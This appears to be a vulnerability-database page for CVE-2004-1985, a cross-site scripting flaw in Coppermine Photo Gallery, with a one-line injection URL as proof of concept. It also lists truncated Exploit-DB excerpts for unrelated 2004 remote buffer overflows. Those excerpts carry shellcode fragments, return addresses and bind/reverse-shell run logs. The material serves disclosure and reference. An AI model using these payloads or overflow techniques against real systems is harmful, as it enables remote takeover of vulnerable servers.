CVE-2004-1985
Published 2004-04-30
Priority: P4 · 19 · medium · 4.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 3.91% (89.0th percentile)
Cross-site scripting (XSS) vulnerability in menu.inc.php in Coppermine Photo Gallery 1.2.2b allows remote attackers to inject arbitrary HTML or web script via the CPG_URL parameter.
Affected
11 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| coppermine | coppermine_photo_gallery | — | — |
| coppermine | coppermine_photo_gallery | — | — |
| coppermine | coppermine_photo_gallery | — | — |
| coppermine | coppermine_photo_gallery | — | — |
| coppermine | coppermine_photo_gallery | — | — |
| coppermine | coppermine_photo_gallery | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
No detection rules found.
Exploit-DB
Ipswitch WS_FTP Server 5.03 - MKD Remote Buffer Overflow
exploitdb · 2004-11-29 · CVE-2004-1135
---
/*
no@0x00:~/Exploits/IPS-WSFTP$ ./IPSWSFTP-exploit 10.20.30.2 test test
***Ipswitch WS_FTP Remote buffer overflow exploit by NoPh0BiA.***
[x] Connected to: 10.20.30.2 on port 21.
[x] Sending Login..done.
[x] Sending bad code..done.
[x] Checking if exploitation was successful..
[x] Connected to: 10.20.30.2 on port 4444.
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
Greetz to Reed Arvin, NtWaK0,kane,schap, and kamalo :)
*/
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 21
#define RPORT 4444
#define RET "\x53\x9B\x2E\x7C" /*win2k sp4*/
char shellcode[]=
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xb1\xbe"
"
Exploit-DB
MiniShare 1.4.1 - Remote Buffer Overflow (2)
exploitdb · 2004-11-16 · CVE-2004-2271
---
/*
no@0x00:~/Exploits/minishare$ ./mini-exploit 10.20.30.2
***MiniShare remote buffer overflow UNIX exploit by NoPh0BiA.***
[x] Connected to: 10.20.30.2 on port 80.
[x] Sending bad code..done.
[x] Trying to connect to: 10.20.30.2 on port 4444..
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
E:\Program Files\MiniShare>
Greetz to NtWaK0,kane,kamalo,foufz, and schap :)
http://NoPh0BiA.lostspirits.org
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 80
#define PORT1 4444
#define RET "\xB8\x9E\xE3\x77" /*2k sp2*/
char shellcode[]=
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x34\x0a"
"\x2f\xfd\x83\xeb\xfc\xe2\xf4\xc8\xe2\x79\xfd\
Exploit-DB
TABS MailCarrier 2.51 - Remote Buffer Overflow
exploitdb · 2004-11-16 · CVE-2004-1638
---
/* Remote exploit for MailCarrier by NoPh0BiA,
no@0x00:~/Exploits/MailCarrier$ ./mailcarried-exploit 192.168.0.1
**MailCarrier Buffer Overflow Exploit by NoPh0BiA.**
[x] Connected to: 192.168.0.1 PORT: 25
[x] Sending evil buffer..done.
[x] Trying to connect to port 31337..
[x] Connected to: 192.168.0.1 PORT: 31337
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
Greets to NtWaK0,schap,kane,kamalo,foufs :P
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 25
#define RPORT 31337
#define RET "\xD3\x39\xD3\x77" /*win2k adv server sp4*/
char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4d\x8
Exploit-DB
Ability Server 2.34 (Unix) - FTP 'STOR' Remote Buffer Overflow
exploitdb · 2004-11-07 · CVE-2004-1626
---
/*
no@0x00:~/Exploits/abilityftp$ ./ability-exploit
**Ability Server 2.34 Remote buffer overflow exploit in ftp STOR by NoPh0BiA.**
[x] Launching listener.
[x] Bind successfull.
[x] Listening on port 31337.
[x] Connected to: 192.168.0.1.
[x] Sending bad code...done.
[x] Waiting for shell.
[x] Got connection from 192.168.0.1.
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop\abilitywebserver>
reverse shellcode that connects back to 192.168.0.2 lamers get your own shellcode ;)
bad chars 0x00 0x0a 0x0d.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define RET "\xC7\xF2\xC8\x77" /*win
Exploit-DB
TABS MailCarrier 2.51 - SMTP 'EHLO' / 'HELO' Remote Buffer Overflow
exploitdb · 2004-10-26 · CVE-2004-1638
---
#########################################################
# MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow #
# Advanced, secure and easy to use FTP Server. #
# 23 Oct 2004 - muts #
#########################################################
# D:\BO>mailcarrier-2.5-EHLO.py #
#########################################################
# D:\data\tools>nc -v 192.168.1.32 101 #
# localhost [127.0.0.1] 101 (hostname) open #
# Microsoft Windows 2000 [Version 5.00.2195] #
# (C) Copyright 1985-2000 Microsoft Corp. #
# C:\WINNT\system32> #
#########################################################
import struct
import socket
print "\n\n###############################################"
print "\nMailCarrier 2.51 SMTP EHLO / HELO
Exploit-DB
Ability Server 2.34 - FTP 'STOR' Remote Buffer Overflow
exploitdb · 2004-10-21 · CVE-2004-1626
---
###################################
# Ability Server 2.34 FTP STOR Buffer Overflow #
# Advanced, secure and easy to use FTP Server. #
# 21 Oct 2004 - muts #
###################################
# D:\BO>ability-2.34-ftp-stor.py #
###################################
# D:\data\tools>nc -v 127.0.0.1 4444 #
# localhost [127.0.0.1] 4444 (?) open #
# Microsoft Windows XP [Version 5.1.2600] #
# (C) Copyright 1985-2001 Microsoft Corp. #
# D:\Program Files\abilitywebserver> #
###################################
import ftplib
from ftplib import FTP
import struct
print "\n\n################################"
print "\nAbility Server 2.34 FTP STOR buffer Overflow"
print "\nFound & coded by muts [at] whitehat.co.il"
print "\nFor Educational Pur
Exploit-DB
Icecast 2.0.1 (Win32) - Remote Code Execution (1)
exploitdb · 2004-10-06 · CVE-2004-1561
---
/*
by Luigi Auriemma
Shellcode add-on by Delikon
www.Delikon.de
Because of all the forbidden bytes in a http get request
i had to use a very small shellcode, which was blown up
by Msf::Encoder::PexAlphaNum. Great encoder.
C:>iceexec 127.0.0.1
Icecast nc 127.0.0.1 9999
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:Icecast2 Win32>
*/
#include
#include
#include
#ifdef WIN32
#pragma comment(lib, "ws2_32.lib")
#include
#include "winerr.h"
#define close closesocket
#else
#include
#include
#include
#include
#include
#include
#endif
#define VER "0.1"
#define PORT 8000
#define BUFFSZ2048
#define TIMEOUT 3
#define EXEC"GET / HTTP/1.0rn"
"arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn"
"arn" "arn" "a
Exploit-DB
Coppermine Photo Gallery 1.2.2b - 'menu.inc.php' Cross-Site Scripting
exploitdb · 2004-04-30 · CVE-2004-1985
---
source: https://www.securityfocus.com/bid/10253/info
Coppermine Photo Gallery is reported prone to multiple input-validation vulnerabilities, some of which may lead to arbitrary command execution. These issues occur because the application fails to properly sanitize and validate user-supplied input before using it in dynamic content and in function calls that execute system commands.
Attackers may exploit these issues to steal cookie-based authentication credentials, map the application root directory of the affected application, execute arbitrary commands, and include arbitrary files. Other attacks are also possible.
http://www.example.com/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=foobar">
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=108360247732014&w=2
http://secunia.com/advisories/11524
http://www.osvdb.org/5757
http://www.securityfocus.com/bid/10253
http://www.waraxe.us/index.php?modname=sa&id=26
https://exchange.xforce.ibmcloud.com/vulnerabilities/16040
Published: 2004-04-30